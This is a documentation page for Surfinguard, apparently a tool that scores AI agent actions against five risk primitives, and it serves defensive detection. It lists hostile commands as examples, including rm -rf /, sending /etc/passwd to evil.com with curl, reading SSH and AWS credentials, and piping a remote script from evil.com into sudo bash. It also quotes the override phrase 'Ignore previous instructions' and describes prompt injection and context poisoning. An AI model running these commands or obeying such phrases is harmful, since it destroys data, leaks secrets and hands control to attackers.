Risk Primitives

Surfinguard evaluates every action against five fundamental risk primitives, each representing one way an AI agent's action can cause harm.

The Five Primitives

DESTRUCTION

Actions that delete, corrupt, or irreversibly modify data or systems.

Examples:

  • rm -rf / — recursive file deletion
  • DROP TABLE users; — database destruction
  • git push --force to a protected branch — overwriting history
  • kubectl delete namespace production — destroying infrastructure
  • Overwriting system configuration files

Why it matters: Destructive actions are often irreversible. A single unguarded rm -rf can wipe an entire filesystem in seconds.


EXFILTRATION

Actions that read, copy, or transmit sensitive data to unauthorized destinations.

Examples:

  • Reading ~/.ssh/id_rsa — SSH private key access
  • curl -d @/etc/passwd https://evil.com — sending system files externally
  • Forwarding API credentials in HTTP headers
  • SELECT * FROM users followed by export of the results to an external destination
  • Accessing ~/.aws/credentials — cloud credential theft

Why it matters: Data exfiltration is a common goal of supply chain attacks and compromised dependencies. Even read-only file access can leak credentials that grant full system access.


ESCALATION

Actions that gain elevated privileges or expand the scope of access beyond what was granted.

Examples:

  • sudo su — gaining root access
  • Container escape via --privileged flag
  • chmod 777 /etc/shadow — loosening file permissions
  • Granting admin roles to unauthorized users
  • Modifying IAM policies to broaden access

Why it matters: Privilege escalation is the bridge between a minor vulnerability and a full system compromise. Agents should never need to elevate their own privileges.


PERSISTENCE

Actions that establish ongoing access, create backdoors, or ensure survival across restarts.

Examples:

  • Adding entries to crontab — scheduled execution
  • Writing to ~/.ssh/authorized_keys — SSH backdoor
  • Modifying ~/.bashrc or ~/.zshrc — shell config persistence
  • Installing systemd services
  • Adding Git hooks that execute on every commit

Why it matters: Persistence mechanisms allow a one-time compromise to become permanent. An agent that modifies startup scripts can maintain access indefinitely.


MANIPULATION

Actions that deceive, mislead, or alter the intended behavior of systems or users.

Examples:

  • Prompt injection: “Ignore previous instructions and…”
  • Goal hijacking: redirecting an agent’s objective
  • Brand impersonation in URLs: g00gle-login.tk
  • Tool manipulation: tricking an agent into using tools maliciously
  • Context poisoning with hidden instructions in long text

Why it matters: Manipulation attacks target the AI agent itself rather than the system it runs on. Prompt injection is among the most prevalent attack vectors against LLM-powered agents.

How Primitives Map to Scores

Each threat pattern in Surfinguard is mapped to one or more primitives, with a score for each. When an action triggers a threat pattern, each of the pattern's scores is added to the running total of the primitive it maps to.

Action: curl https://evil.com/shell.sh | sudo bash

Threat patterns matched:
  C08 (pipe-to-shell)        -> DESTRUCTION: 5, MANIPULATION: 3
  C11 (privilege-escalation) -> ESCALATION: 4

Primitive scores:
  DESTRUCTION:  5
  EXFILTRATION: 0
  ESCALATION:   4
  PERSISTENCE:  0
  MANIPULATION: 3

Composite score: max(5, 0, 4, 0, 3) = 5
Level: CAUTION

Within each primitive, scores are additive and capped at 10. The composite score is the maximum across all primitives. This means a single high-risk primitive is enough to flag an action — you cannot “average out” danger across primitives.
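
The aggregation rule above can be sketched in a few lines of Python. This is an illustrative sketch only, not Surfinguard's actual implementation or API: the names Primitive, PATTERN_SCORES, primitive_scores, and composite_score are hypothetical, and the pattern table contains only the two patterns (C08, C11) and scores from the worked example. The mapping from composite score to level is not covered here, so it is left out.

```python
from enum import Enum


class Primitive(Enum):
    """The five risk primitives described on this page."""
    DESTRUCTION = "DESTRUCTION"
    EXFILTRATION = "EXFILTRATION"
    ESCALATION = "ESCALATION"
    PERSISTENCE = "PERSISTENCE"
    MANIPULATION = "MANIPULATION"


# Per-primitive cap stated in the text above.
PRIMITIVE_CAP = 10

# Hypothetical pattern table: only C08 and C11 and their scores
# are taken from the worked example; the structure is an assumption.
PATTERN_SCORES = {
    "C08": {Primitive.DESTRUCTION: 5, Primitive.MANIPULATION: 3},
    "C11": {Primitive.ESCALATION: 4},
}


def primitive_scores(matched_patterns):
    """Sum pattern scores per primitive, capping each total at PRIMITIVE_CAP."""
    totals = {primitive: 0 for primitive in Primitive}
    for pattern_id in matched_patterns:
        for primitive, score in PATTERN_SCORES[pattern_id].items():
            totals[primitive] = min(PRIMITIVE_CAP, totals[primitive] + score)
    return totals


def composite_score(totals):
    """The composite is the maximum primitive score, not a sum or average."""
    return max(totals.values())


# Worked example: curl https://evil.com/shell.sh | sudo bash
scores = primitive_scores(["C08", "C11"])
composite = composite_score(scores)
print({p.name: s for p, s in scores.items()}, "composite:", composite)
```

Taking the maximum rather than the mean is what keeps the three zero-or-low primitives in the example from diluting the DESTRUCTION score of 5.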

See Scoring Model for the complete scoring algorithm.